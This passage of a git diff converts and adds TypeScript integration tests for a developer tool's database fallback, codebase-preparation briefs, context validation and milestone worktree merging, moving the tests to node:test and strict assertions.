+    assert.deepStrictEqual(requirements.length, 0, 'partial: queryRequirements returns empty');
 
     const scopedReqs = queryRequirements({ sliceId: 'S01' });
-    assertEq(scopedReqs.length, 0, 'partial: scoped queryRequirements returns empty');
+    assert.deepStrictEqual(scopedReqs.length, 0, 'partial: scoped queryRequirements returns empty');
 
     // Format works on partial data
     const formattedD = formatDecisionsForPrompt(m001Decisions);
-    assertTrue(formattedD.length > 0, 'partial: formatted decisions non-empty');
+    assert.ok(formattedD.length > 0, 'partial: formatted decisions non-empty');
 
     const formattedR = formatRequirementsForPrompt(requirements);
-    assertEq(formattedR, '', 'partial: formatted empty requirements is empty string');
+    assert.deepStrictEqual(formattedR, '', 'partial: formatted empty requirements is empty string');
 
     closeDatabase();
   } finally {
     closeDatabase();
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
 // ═══════════════════════════════════════════════════════════════════════════
 // Edge Case 3: Fallback Mode (_resetProvider)
 // ═══════════════════════════════════════════════════════════════════════════
 
-console.log('\n=== integration-edge: fallback mode ===');
-{
+test('integration-edge: fallback mode', () => {
   const base = mkdtempSync(join(tmpdir(), 'gsd-int-edge-fallback-'));
   const gsdDir = join(base, '.gsd');
   mkdirSync(gsdDir, { recursive: true });
@@ -175,54 +171,53 @@ console.log('\n=== integration-edge: fallback mode ===');
   try {
     // Step 1: Open DB normally and verify it works
     openDatabase(dbPath);
-    assertTrue(isDbAvailable(), 'fallback: DB available after open');
+    assert.ok(isDbAvailable(), 'fallback: DB available after open');
 
     migrateFromMarkdown(base);
     const before = queryDecisions();
-    assertTrue(before.length === 4, `fallback: 4 decisions before reset (got ${before.length})`);
+    assert.ok(before.length === 4, `fallback: 4 decisions before reset (got ${before.length})`);
 
     // Step 2: Close and reset provider → DB unavailable
     closeDatabase();
     _resetProvider();
-    assertTrue(!isDbAvailable(), 'fallback: DB unavailable after _resetProvider');
+    assert.ok(!isDbAvailable(), 'fallback: DB unavailable after _resetProvider');
 
     // Step 3: Queries degrade gracefully (return empty, don't throw)
     const degradedDecisions = queryDecisions();
-    assertEq(degradedDecisions.length, 0, 'fallback: queryDecisions returns empty when unavailable');
+    assert.deepStrictEqual(degradedDecisions.length, 0, 'fallback: queryDecisions returns empty when unavailable');
 
     const degradedRequirements = queryRequirements();
-    assertEq(degradedRequirements.length, 0, 'fallback: queryRequirements returns empty when unavailable');
+    assert.deepStrictEqual(degradedRequirements.length, 0, 'fallback: queryRequirements returns empty when unavailable');
 
     const degradedScopedD = queryDecisions({ milestoneId: 'M001' });
-    assertEq(degradedScopedD.length, 0, 'fallback: scoped queryDecisions returns empty when unavailable');
+    assert.deepStrictEqual(degradedScopedD.length, 0, 'fallback: scoped queryDecisions returns empty when unavailable');
 
     const degradedScopedR = queryRequirements({ sliceId: 'S01' });
-    assertEq(degradedScopedR.length, 0, 'fallback: scoped queryRequirements returns empty when unavailable');
+    assert.deepStrictEqual(degradedScopedR.length, 0, 'fallback: scoped queryRequirements returns empty when unavailable');
 
     // Format functions work on empty arrays (no crash)
     const formattedD = formatDecisionsForPrompt(degradedDecisions);
-    assertEq(formattedD, '', 'fallback: format degraded decisions is empty');
+    assert.deepStrictEqual(formattedD, '', 'fallback: format degraded decisions is empty');
 
     const formattedR = formatRequirementsForPrompt(degradedRequirements);
-    assertEq(formattedR, '', 'fallback: format degraded requirements is empty');
+    assert.deepStrictEqual(formattedR, '', 'fallback: format degraded requirements is empty');
 
     // Step 4: Re-open DB → restores availability
     openDatabase(dbPath);
-    assertTrue(isDbAvailable(), 'fallback: DB available after re-open');
+    assert.ok(isDbAvailable(), 'fallback: DB available after re-open');
 
     // Data should be there from the file-backed DB (persisted by first open)
     // But rows may need re-import since the DB was freshly opened from the file
     migrateFromMarkdown(base);
     const restored = queryDecisions();
-    assertTrue(restored.length === 4, `fallback: 4 decisions after re-open (got ${restored.length})`);
+    assert.ok(restored.length === 4, `fallback: 4 decisions after re-open (got ${restored.length})`);
 
     closeDatabase();
   } finally {
     closeDatabase();
     rmSync(base, { recursive: true, force: true });
   }
-}
+});
 
 // ─── Report ────────────────────────────────────────────────────────────────
 
-report();
diff --git a/src/resources/extensions/gsd/tests/integration-prepared-discussion.test.ts b/src/resources/extensions/gsd/tests/integration-prepared-discussion.test.ts
new file mode 100644
index 000000000..ea4aa4f50
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration-prepared-discussion.test.ts
@@ -0,0 +1,525 @@
+/**
+ * Integration tests for the prepared discussion system.
+ *
+ * Exercises the full preparation pipeline against the real GSD-2 codebase:
+ * - runPreparation() produces valid briefs
+ * - TypeScript is detected as primary language
+ * - Module structure includes top-level directories
+ * - Completes within R112 timing requirement (<60s)
+ * - prepareAndBuildDiscussPrompt() uses discuss-prepared template when enabled
+ * - Fallback to standard prompt when preparation is disabled
+ */
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { join } from "node:path";
+import { existsSync } from "node:fs";
+import {
+  runPreparation,
+  formatCodebaseBrief,
+  formatPriorContextBrief,
+  formatEcosystemBrief,
+  type PreparationUIContext,
+  type PreparationPreferences,
+  type PreparationResult,
+} from "../preparation.ts";
+import { validateEnhancedContext } from "../prompt-validation.ts";
+import { getLastPreparationResult, clearPreparationResult } from "../guided-flow.ts";
+
+// ─── Test Helpers ───────────────────────────────────────────────────────────────
+
+/**
+ * Mock UI context that captures notifications for testing.
+ * Follows the pattern from preparation.test.ts.
+ */
+function createMockUI(): PreparationUIContext & { notifications: Array<{ message: string; type?: string }> } {
+  const notifications: Array<{ message: string; type?: string }> = [];
+  return {
+    notifications,
+    notify(message: string, type?: "info" | "warning" | "error" | "success") {
+      notifications.push({ message, type });
+    },
+  };
+}
+
+/**
+ * Get the GSD extension source directory for integration testing.
+ * This is the real codebase we'll analyze.
+ */
+function getGsdExtensionDir(): string {
+  // Navigate from tests/ up to gsd/ directory
+  return join(import.meta.dirname, "..");
+}
+
+/**
+ * Get the GSD-2 project root for full codebase analysis.
+ */
+function getProjectRoot(): string {
+  // Navigate from tests/ up to the project root
+  // tests/ -> gsd/ -> extensions/ -> resources/ -> src/ -> gsd-2/
+  return join(import.meta.dirname, "..", "..", "..", "..", "..");
+}
+
+// ─── R111 Validation: runPreparation against real codebase ──────────────────────
+
+test("R111: runPreparation() produces valid codebase brief for GSD extension", async (t) => {
+  const dir = getGsdExtensionDir();
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false, // Skip web research to avoid API key requirement
+    discuss_depth: "standard",
+  };
+
+  const result = await runPreparation(dir, ui, prefs);
+
+  // Verify preparation completed successfully
+  assert.equal(result.enabled, true, "preparation should be enabled");
+  assert.ok(result.codebase, "should have codebase brief");
+  assert.ok(result.codebaseBrief, "should have formatted codebase brief");
+
+  // Verify TypeScript is detected as primary language
+  assert.equal(
+    result.codebase.techStack.primaryLanguage,
+    "javascript/typescript",
+    "should detect TypeScript as primary language",
+  );
+
+  // Verify module structure includes top-level directories
+  const topLevelDirs = result.codebase.moduleStructure.topLevelDirs;
+  assert.ok(topLevelDirs.length > 0, "should detect top-level directories");
+
+  // Common directories in the GSD extension
+  const expectedDirs = ["tests", "prompts", "templates", "migrate"];
+  const foundExpected = expectedDirs.filter(d => topLevelDirs.includes(d));
+  assert.ok(
+    foundExpected.length >= 2,
+    `should detect common directories, found: ${topLevelDirs.join(", ")}`,
+  );
+
+  // Verify sampled files exist
+  assert.ok(result.codebase.sampledFiles.length > 0, "should sample source files");
+});
+
+test("R111: runPreparation() produces valid prior context brief", async (t) => {
+  const dir = getGsdExtensionDir();
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  const result = await runPreparation(dir, ui, prefs);
+
+  // Verify prior context brief structure
+  assert.ok(result.priorContext, "should have prior context");
+  assert.ok(result.priorContextBrief, "should have formatted prior context brief");
+
+  // Prior context aggregates decisions, requirements, knowledge, summaries
+  assert.ok("decisions" in result.priorContext, "should have decisions");
+  assert.ok("requirements" in result.priorContext, "should have requirements");
+  assert.ok("knowledge" in result.priorContext, "should have knowledge");
+  assert.ok("summaries" in result.priorContext, "should have summaries");
+});
+
+test("R111: runPreparation() produces valid ecosystem brief (skipped without API key)", async (t) => {
+  const dir = getGsdExtensionDir();
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false, // Explicitly disable
+  };
+
+  const result = await runPreparation(dir, ui, prefs);
+
+  // Verify ecosystem brief structure
+  assert.ok(result.ecosystem, "should have ecosystem brief");
+  assert.ok(result.ecosystemBrief, "should have formatted ecosystem brief");
+  assert.equal(result.ecosystem.available, false, "ecosystem should be unavailable when web research disabled");
+  assert.ok(result.ecosystem.skippedReason, "should have skip reason");
+});
+
+test("R112: runPreparation() completes within 60s requirement", async (t) => {
+  const dir = getGsdExtensionDir();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+    discuss_depth: "standard",
+  };
+
+  const startTime = performance.now();
+  const result = await runPreparation(dir, null, prefs);
+  const elapsed = performance.now() - startTime;
+
+  // R112 requirement: preparation must complete within 60 seconds
+  assert.ok(result.durationMs < 60000, `should complete within 60s, took ${result.durationMs}ms`);
+  assert.ok(elapsed < 60000, `wall-clock time should be under 60s, was ${elapsed}ms`);
+
+  // Should be much faster for a local directory analysis
+  assert.ok(result.durationMs < 10000, `should typically complete within 10s, took ${result.durationMs}ms`);
+});
+
+// ─── Codebase Pattern Detection ─────────────────────────────────────────────────
+
+test("runPreparation() detects code patterns from GSD extension", async (t) => {
+  const dir = getGsdExtensionDir();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  const result = await runPreparation(dir, null, prefs);
+
+  // The GSD extension uses async/await extensively
+  assert.ok(
+    result.codebase.patterns.asyncStyle === "async/await" || result.codebase.patterns.asyncStyle === "mixed",
+    `should detect async/await or mixed, got ${result.codebase.patterns.asyncStyle}`,
+  );
+
+  // The GSD extension uses try/catch for error handling
+  assert.ok(
+    result.codebase.patterns.errorHandling === "try/catch" || result.codebase.patterns.errorHandling === "mixed",
+    `should detect try/catch or mixed, got ${result.codebase.patterns.errorHandling}`,
+  );
+
+  // TypeScript uses camelCase or mixed naming
+  assert.ok(
+    result.codebase.patterns.namingConvention === "camelCase" || result.codebase.patterns.namingConvention === "mixed",
+    `should detect camelCase or mixed, got ${result.codebase.patterns.namingConvention}`,
+  );
+
+  // Evidence should be populated
+  assert.ok(result.codebase.patterns.evidence.asyncStyle.length > 0, "should have async style evidence");
+});
+
+test("runPreparation() samples TypeScript files from src/ or project root", async (t) => {
+  const dir = getGsdExtensionDir();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  const result = await runPreparation(dir, null, prefs);
+
+  // Should sample TypeScript files
+  const tsFiles = result.codebase.sampledFiles.filter(
+    f => f.endsWith(".ts") || f.endsWith(".tsx"),
+  );
+  assert.ok(tsFiles.length > 0, "should sample TypeScript files");
+
+  // Should exclude test files
+  const testFiles = result.codebase.sampledFiles.filter(
+    f => f.includes(".test.") || f.includes(".spec."),
+  );
+  assert.equal(testFiles.length, 0, "should not sample test files");
+});
+
+// ─── Brief Formatting ───────────────────────────────────────────────────────────
+
+test("formatCodebaseBrief() produces LLM-readable markdown", async (t) => {
+  const dir = getGsdExtensionDir();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  const result = await runPreparation(dir, null, prefs);
+  const formatted = formatCodebaseBrief(result.codebase);
+
+  // Should contain expected sections
+  assert.ok(formatted.includes("## Tech Stack"), "should have Tech Stack section");
+  assert.ok(formatted.includes("## Module Structure"), "should have Module Structure section");
+  assert.ok(formatted.includes("## Code Patterns"), "should have Code Patterns section");
+
+  // Should contain detected tech
+  assert.ok(formatted.includes("javascript/typescript"), "should include detected language");
+
+  // Should be within character limit
+  assert.ok(formatted.length <= 3000, `should cap at 3000 chars, got ${formatted.length}`);
+});
+
+test("formatPriorContextBrief() produces structured prior context output", async (t) => {
+  const dir = getGsdExtensionDir();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  const result = await runPreparation(dir, null, prefs);
+  const formatted = formatPriorContextBrief(result.priorContext);
+
+  // Should contain expected sections
+  assert.ok(formatted.includes("## Prior Decisions"), "should have Prior Decisions section");
+  assert.ok(formatted.includes("## Prior Requirements"), "should have Prior Requirements section");
+  assert.ok(formatted.includes("## Prior Knowledge"), "should have Prior Knowledge section");
+  assert.ok(formatted.includes("## Prior Milestone Summaries"), "should have Prior Milestone Summaries section");
+
+  // Should be within character limit
+  assert.ok(formatted.length <= 6000, `should cap at 6000 chars, got ${formatted.length}`);
+});
+
+test("formatEcosystemBrief() returns simplified message (research happens during discussion)", async (t) => {
+  const dir = getGsdExtensionDir();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  const result = await runPreparation(dir, null, prefs);
+  const formatted = formatEcosystemBrief(result.ecosystem);
+
+  // Should contain section header
+  assert.ok(formatted.includes("## Ecosystem Research"), "should have Ecosystem Research section");
+
+  // Should indicate research happens during discussion
+  assert.ok(formatted.includes("during the discussion"), "should mention research happens during discussion");
+  assert.ok(formatted.includes("web search tools"), "should mention web search tools");
+
+  // Should be within character limit
+  assert.ok(formatted.length <= 4000, `should cap at 4000 chars, got ${formatted.length}`);
+});
+
+// ─── Preparation Result Storage ─────────────────────────────────────────────────
+
+test("getLastPreparationResult() returns null initially", async (t) => {
+  // Clear any existing state
+  clearPreparationResult();
+
+  const result = getLastPreparationResult();
+  assert.equal(result, null, "should return null when no preparation has run");
+});
+
+test("clearPreparationResult() clears stored result", async (t) => {
+  // This test verifies the clear function works
+  // We can't easily test the set behavior without running the full guided-flow
+  clearPreparationResult();
+  const result = getLastPreparationResult();
+  assert.equal(result, null, "should be null after clear");
+});
+
+// ─── TUI Progress Notifications ─────────────────────────────────────────────────
+
+test("runPreparation() emits TUI progress notifications", async (t) => {
+  const dir = getGsdExtensionDir();
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  await runPreparation(dir, ui, prefs);
+
+  // Should have notifications for each phase
+  assert.ok(ui.notifications.length > 0, "should have notifications");
+
+  // Verify codebase analysis notifications
+  assert.ok(
+    ui.notifications.some(n => n.message.includes("Analyzing codebase")),
+    "should show codebase analysis start",
+  );
+  assert.ok(
+    ui.notifications.some(n => n.message.includes("✓ Analyzed codebase")),
+    "should show codebase analysis complete",
+  );
+
+  // Verify prior context notifications
+  assert.ok(
+    ui.notifications.some(n => n.message.includes("Reviewing prior context")),
+    "should show prior context start",
+  );
+  assert.ok(
+    ui.notifications.some(n => n.message.includes("✓ Reviewed prior context")),
+    "should show prior context complete",
+  );
+});
+
+test("runPreparation() works in silent mode (no UI)", async (t) => {
+  const dir = getGsdExtensionDir();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  // Pass null for UI
+  const result = await runPreparation(dir, null, prefs);
+
+  // Should complete without error
+  assert.equal(result.enabled, true, "should work without UI");
+  assert.ok(result.codebase, "should have codebase");
+  assert.ok(result.priorContext, "should have priorContext");
+  assert.ok(result.durationMs > 0, "should have duration");
+});
+
+// ─── Preference-Controlled Behavior ─────────────────────────────────────────────
+
+test("runPreparation() returns early when discuss_preparation is false", async (t) => {
+  const dir = getGsdExtensionDir();
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: false,
+  };
+
+  const result = await runPreparation(dir, ui, prefs);
+
+  assert.equal(result.enabled, false, "should indicate preparation disabled");
+  assert.equal(result.codebaseBrief, "", "should have empty codebase brief");
+  assert.equal(result.priorContextBrief, "", "should have empty prior context brief");
+  assert.equal(result.ecosystemBrief, "", "should have empty ecosystem brief");
+  assert.equal(ui.notifications.length, 0, "should not show any notifications");
+});
+
+test("runPreparation() ecosystem research always returns unavailable (happens during discussion)", async (t) => {
+  const dir = getGsdExtensionDir();
+  const ui = createMockUI();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: true, // Even with this enabled, ecosystem research returns unavailable
+  };
+
+  const result = await runPreparation(dir, ui, prefs);
+
+  assert.equal(result.enabled, true);
+  assert.equal(result.ecosystemResearchPerformed, false, "should not perform ecosystem research from preparation");
+  assert.equal(result.ecosystem.available, false);
+  assert.ok(
+    result.ecosystem.skippedReason?.includes("during the discussion"),
+    "should indicate research happens during discussion",
+  );
+
+  // Should NOT have ecosystem research notifications (no longer part of preparation)
+  assert.ok(
+    !ui.notifications.some(n => n.message.includes("Researching ecosystem")),
+    "should not show ecosystem research notification",
+  );
+});
+
+// ─── validateEnhancedContext Integration ────────────────────────────────────────
+
+test("validateEnhancedContext() validates required sections", async (t) => {
+  // Test with valid enhanced context
+  const validContext = `# M001 — Test Milestone
+
+## Scope
+
+This milestone covers X, Y, Z.
+
+## Architectural Decisions
+
+### Decision 1: Use TypeScript
+
+We will use TypeScript for type safety.
+
+## Acceptance Criteria
+
+- [ ] Feature A works
+- [ ] Feature B works
+`;
+
+  const validResult = validateEnhancedContext(validContext);
+  assert.equal(validResult.valid, true, "should validate complete context");
+  assert.deepEqual(validResult.missing, [], "should have no missing sections");
+
+  // Test with missing sections
+  const invalidContext = `# M001 — Test Milestone
+
+## Scope
+
+This milestone covers X, Y, Z.
+`;
+
+  const invalidResult = validateEnhancedContext(invalidContext);
+  assert.equal(invalidResult.valid, false, "should reject incomplete context");
+  assert.ok(invalidResult.missing.length > 0, "should list missing sections");
+  assert.ok(
+    invalidResult.missing.some(m => m.includes("Architectural Decisions")),
+    "should report missing Architectural Decisions",
+  );
+  assert.ok(
+    invalidResult.missing.some(m => m.includes("Acceptance Criteria")),
+    "should report missing Acceptance Criteria",
+  );
+});
+
+test("validateEnhancedContext() requires decision entries in Architectural Decisions", async (t) => {
+  // Empty architectural decisions section
+  const emptyDecisions = `# M001 — Test Milestone
+
+## Scope
+
+This milestone covers X, Y, Z.
+
+## Architectural Decisions
+
+(No decisions yet)
+
+## Acceptance Criteria
+
+- [ ] Feature A works
+`;
+
+  const result = validateEnhancedContext(emptyDecisions);
+  assert.equal(result.valid, false, "should reject empty decisions section");
+  assert.ok(
+    result.missing.some(m => m.includes("decision entry")),
+    "should report missing decision entry",
+  );
+});
+
+// ─── Full Pipeline Integration ──────────────────────────────────────────────────
+
+test("Full pipeline: preparation produces consistent results across runs", async (t) => {
+  const dir = getGsdExtensionDir();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  // Run preparation twice
+  const result1 = await runPreparation(dir, null, prefs);
+  const result2 = await runPreparation(dir, null, prefs);
+
+  // Results should be consistent (same codebase, same analysis)
+  assert.equal(
+    result1.codebase.techStack.primaryLanguage,
+    result2.codebase.techStack.primaryLanguage,
+    "primary language should be consistent",
+  );
+
+  assert.deepEqual(
+    result1.codebase.moduleStructure.topLevelDirs.sort(),
+    result2.codebase.moduleStructure.topLevelDirs.sort(),
+    "top-level directories should be consistent",
+  );
+
+  assert.equal(
+    result1.codebase.patterns.asyncStyle,
+    result2.codebase.patterns.asyncStyle,
+    "async style should be consistent",
+  );
+});
+
+test("Full pipeline: preparation handles empty .gsd directory gracefully", async (t) => {
+  // The GSD extension directory may or may not have a .gsd subdirectory
+  // Either way, preparation should not crash
+  const dir = getGsdExtensionDir();
+  const prefs: PreparationPreferences = {
+    discuss_preparation: true,
+    discuss_web_research: false,
+  };
+
+  let result: PreparationResult | undefined;
+  let error: unknown;
+
+  try {
+    result = await runPreparation(dir, null, prefs);
+  } catch (e) {
+    error = e;
+  }
+
+  assert.equal(error, undefined, "should not throw");
+  assert.ok(result, "should return result");
+  assert.equal(result!.enabled, true, "should be enabled");
+
+  // Prior context should gracefully handle missing files
+  assert.ok(result!.priorContext, "should have prior context even if files missing");
+});
diff --git a/src/resources/extensions/gsd/tests/all-milestones-complete-merge.test.ts b/src/resources/extensions/gsd/tests/integration/all-milestones-complete-merge.test.ts
similarity index 55%
rename from src/resources/extensions/gsd/tests/all-milestones-complete-merge.test.ts
rename to src/resources/extensions/gsd/tests/integration/all-milestones-complete-merge.test.ts
index 58cc118e0..d3a0c7c2e 100644
--- a/src/resources/extensions/gsd/tests/all-milestones-complete-merge.test.ts
+++ b/src/resources/extensions/gsd/tests/integration/all-milestones-complete-merge.test.ts
@@ -31,7 +31,7 @@ import {
   isInAutoWorktree,
   getAutoWorktreeOriginalBase,
   mergeMilestoneToMain,
-} from "../auto-worktree.ts";
+} from "../../auto-worktree.ts";
 
 const __dirname = dirname(fileURLToPath(import.meta.url));
 
@@ -78,9 +78,9 @@ function createMilestoneArtifacts(dir: string, mid: string): void {
 // ─── Source-level: verify the merge code exists in the "all complete" path ────
 
 test("auto-loop 'all milestones complete' path merges before stopping (#962)", () => {
-  const loopSrc = readFileSync(join(__dirname, "..", "auto", "phases.ts"), "utf-8");
+  const loopSrc = readFileSync(join(__dirname, "../..", "auto", "phases.ts"), "utf-8");
   const resolverSrc = readFileSync(
-    join(__dirname, "..", "worktree-resolver.ts"),
+    join(__dirname, "../..", "worktree-resolver.ts"),
     "utf-8",
   );
 
@@ -130,119 +130,119 @@ test("auto-loop 'all milestones complete' path merges before stopping (#962)", (
 
 // ─── Integration: single milestone completes → merged to main ────────────────
 
-test("single milestone worktree is merged to main when all complete (#962)", () => {
+test("single milestone worktree is merged to main when all complete (#962)", (t) => {
   const savedCwd = process.cwd();
   let tempDir = "";
 
-  try {
-    tempDir = createTempRepo();
-
-    // Set up a single milestone
-    createMilestoneArtifacts(tempDir, "M001");
-    run("git add .", tempDir);
-    run('git commit -m "add milestone"', tempDir);
-
-    // Create worktree and simulate work
-    const wt = createAutoWorktree(tempDir, "M001");
-    assert.ok(isInAutoWorktree(tempDir), "should be in auto-worktree");
-
-    writeFileSync(join(wt, "feature.ts"), "export const feature = true;\n");
-    run("git add .", wt);
-    run('git commit -m "feat(M001): add feature"', wt);
-
-    // Simulate the fix: merge before stopping (what the "all complete" path now does)
-    const roadmapPath = join(
-      tempDir,
-      ".gsd",
-      "milestones",
-      "M001",
-      "M001-ROADMAP.md",
-    );
-    const roadmapContent = readFileSync(roadmapPath, "utf-8");
-    const mergeResult = mergeMilestoneToMain(tempDir, "M001", roadmapContent);
-
-    // Verify work is on main
-    assert.ok(
-      existsSync(join(tempDir, "feature.ts")),
-      "feature.ts should be on main after merge",
-    );
-    assert.equal(process.cwd(), tempDir, "cwd restored to project root");
-    assert.ok(!isInAutoWorktree(tempDir), "no longer in auto-worktree");
-    assert.equal(getAutoWorktreeOriginalBase(), null, "originalBase cleared");
-
-    // Verify milestone branch was cleaned up
-    const branches = run("git branch", tempDir);
-    assert.ok(
-      !branches.includes("milestone/M001"),
-      "milestone branch should be deleted",
-    );
-
-    // Verify squash commit on main
-    const log = run("git log --oneline -3", tempDir);
-    assert.ok(
-      log.includes("M001"),
-      "squash commit on main should reference M001",
-    );
-
-    assert.ok(mergeResult.commitMessage.length > 0, "commit message returned");
-  } finally {
+  t.after(() => {
     process.chdir(savedCwd);
     if (tempDir && existsSync(tempDir)) {
-      rmSync(tempDir, { recursive: true, force: true });
+    rmSync(tempDir, { recursive: true, force: true });
     }
-  }
+  });
+
+  tempDir = createTempRepo();
+
+  // Set up a single milestone
+  createMilestoneArtifacts(tempDir, "M001");
+  run("git add .", tempDir);
+  run('git commit -m "add milestone"', tempDir);
+
+  // Create worktree and simulate work
+  const wt = createAutoWorktree(tempDir, "M001");
+  assert.ok(isInAutoWorktree(tempDir), "should be in auto-worktree");
+
+  writeFileSync(join(wt, "feature.ts"), "export const feature = true;\n");
+  run("git add .", wt);
+  run('git commit -m "feat(M001): add feature"', wt);
+
+  // Simulate the fix: merge before stopping (what the "all complete" path now does)
+  const roadmapPath = join(
+    tempDir,
+    ".gsd",
+    "milestones",
+    "M001",
+    "M001-ROADMAP.md",
+  );
+  const roadmapContent = readFileSync(roadmapPath, "utf-8");
+  const mergeResult = mergeMilestoneToMain(tempDir, "M001", roadmapContent);
+
+  // Verify work is on main
+  assert.ok(
+    existsSync(join(tempDir, "feature.ts")),
+    "feature.ts should be on main after merge",
+  );
+  assert.equal(process.cwd(), tempDir, "cwd restored to project root");
+  assert.ok(!isInAutoWorktree(tempDir), "no longer in auto-worktree");
+  assert.equal(getAutoWorktreeOriginalBase(), null, "originalBase cleared");
+
+  // Verify milestone branch was cleaned up
+  const branches = run("git branch", tempDir);
+  assert.ok(
+    !branches.includes("milestone/M001"),
+    "milestone branch should be deleted",
+  );
+
+  // Verify squash commit on main (milestone ID is in trailer, not subject)
+  const log = run("git log -3", tempDir);
+  assert.ok(
+    log.includes("M001"),
+    "squash commit on main should reference M001",
+  );
+
+  assert.ok(mergeResult.commitMessage.length > 0, "commit message returned");
 });
 
 // ─── Integration: last of multiple milestones completes → merged ─────────────
 
-test("last milestone worktree is merged when it's the final one (#962)", () => {
+test("last milestone worktree is merged when it's the final one (#962)", (t) => {
   const savedCwd = process.cwd();
   let tempDir = "";
 
-  try {
-    tempDir = createTempRepo();
-
-    // Set up two milestones
-    createMilestoneArtifacts(tempDir, "M001");
-    createMilestoneArtifacts(tempDir, "M002");
-    run("git add .", tempDir);
-    run('git commit -m "add milestones"', tempDir);
-
-    // Complete M001 first (merge it)
-    const wt1 = createAutoWorktree(tempDir, "M001");
-    writeFileSync(join(wt1, "m001-work.ts"), "export const m001 = true;\n");
-    run("git add .", wt1);
-    run('git commit -m "feat(M001): m001 work"', wt1);
-    const roadmap1 = readFileSync(
-      join(tempDir, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
-      "utf-8",
-    );
-    mergeMilestoneToMain(tempDir, "M001", roadmap1);
-
-    // Now complete M002 (the LAST milestone — this is the #962 scenario)
-    const wt2 = createAutoWorktree(tempDir, "M002");
-    writeFileSync(join(wt2, "m002-work.ts"), "export const m002 = true;\n");
-    run("git add .", wt2);
-    run('git commit -m "feat(M002): m002 work"', wt2);
-    const roadmap2 = readFileSync(
-      join(tempDir, ".gsd", "milestones", "M002", "M002-ROADMAP.md"),
-      "utf-8",
-    );
-    mergeMilestoneToMain(tempDir, "M002", roadmap2);
-
-    // Both features should now be on main
-    assert.ok(existsSync(join(tempDir, "m001-work.ts")), "M001 work on main");
-    assert.ok(existsSync(join(tempDir, "m002-work.ts")), "M002 work on main");
-    assert.ok(!isInAutoWorktree(tempDir), "not in worktree after final merge");
-
-    // Both milestone branches should be cleaned up
-    const branches = run("git branch", tempDir);
-    assert.ok(!branches.includes("milestone/M001"), "M001 branch deleted");
-    assert.ok(!branches.includes("milestone/M002"), "M002 branch deleted");
-  } finally {
+  t.after(() => {
     process.chdir(savedCwd);
     if (tempDir && existsSync(tempDir)) {
-      rmSync(tempDir, { recursive: true, force: true });
+    rmSync(tempDir, { recursive: true, force: true });
     }
-  }
+  });
+
+  tempDir = createTempRepo();
+
+  // Set up two milestones
+  createMilestoneArtifacts(tempDir, "M001");
+  createMilestoneArtifacts(tempDir, "M002");
+  run("git add .", tempDir);
+  run('git commit -m "add milestones"', tempDir);
+
+  // Complete M001 first (merge it)
+  const wt1 = createAutoWorktree(tempDir, "M001");
+  writeFileSync(join(wt1, "m001-work.ts"), "export const m001 = true;\n");
+  run("git add .", wt1);
+  run('git commit -m "feat(M001): m001 work"', wt1);
+  const roadmap1 = readFileSync(
+    join(tempDir, ".gsd", "milestones", "M001", "M001-ROADMAP.md"),
+    "utf-8",
+  );
+  mergeMilestoneToMain(tempDir, "M001", roadmap1);
+
+  // Now complete M002 (the LAST milestone — this is the #962 scenario)
+  const wt2 = createAutoWorktree(tempDir, "M002");
+  writeFileSync(join(wt2, "m002-work.ts"), "export const m002 = true;\n");
+  run("git add .", wt2);
+  run('git commit -m "feat(M002): m002 work"', wt2);
+  const roadmap2 = readFileSync(
+    join(tempDir, ".gsd", "milestones", "M002", "M002-ROADMAP.md"),
+    "utf-8",
+  );
+  mergeMilestoneToMain(tempDir, "M002", roadmap2);
+
+  // Both features should now be on main
+  assert.ok(existsSync(join(tempDir, "m001-work.ts")), "M001 work on main");
+  assert.ok(existsSync(join(tempDir, "m002-work.ts")), "M002 work on main");
+  assert.ok(!isInAutoWorktree(tempDir), "not in worktree after final merge");
+
+  // Both milestone branches should be cleaned up
+  const branches = run("git branch", tempDir);
+  assert.ok(!branches.includes("milestone/M001"), "M001 branch deleted");
+  assert.ok(!branches.includes("milestone/M002"), "M002 branch deleted");
 });
diff --git a/src/resources/extensions/gsd/tests/integration/atomic-task-closeout.test.ts b/src/resources/extensions/gsd/tests/integration/atomic-task-closeout.test.ts
new file mode 100644
index 000000000..e6c4143d8
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/integration/atomic-task-closeout.test.ts
@@ -0,0 +1,72 @@
+/**
+ * Tests for atomic task closeout (#1650):
+ * Doctor no longer does checkbox reconciliation (reconciliation removed in S06).
+ * This file retains only the non-reconciliation behavior tests.
+ */
+
+import { mkdirSync, writeFileSync, readFileSync, rmSync, existsSync } from "node:fs";
+import { join } from "node:path";
+import { tmpdir } from "node:os";
+import test from "node:test";
+import assert from "node:assert/strict";
+import { runGSDDoctor } from "../../doctor.ts";
+
+function makeTmp(name: string): string {
+  const dir = join(tmpdir(), `atomic-closeout-${name}-${Date.now()}-${Math.random().toString(36).slice(2)}`);
+  mkdirSync(dir, { recursive: true });
+  return dir;
+}
+
+test("doctor does not touch task with checkbox AND summary both present", async () => {
+  const base = makeTmp("doctor-ok");
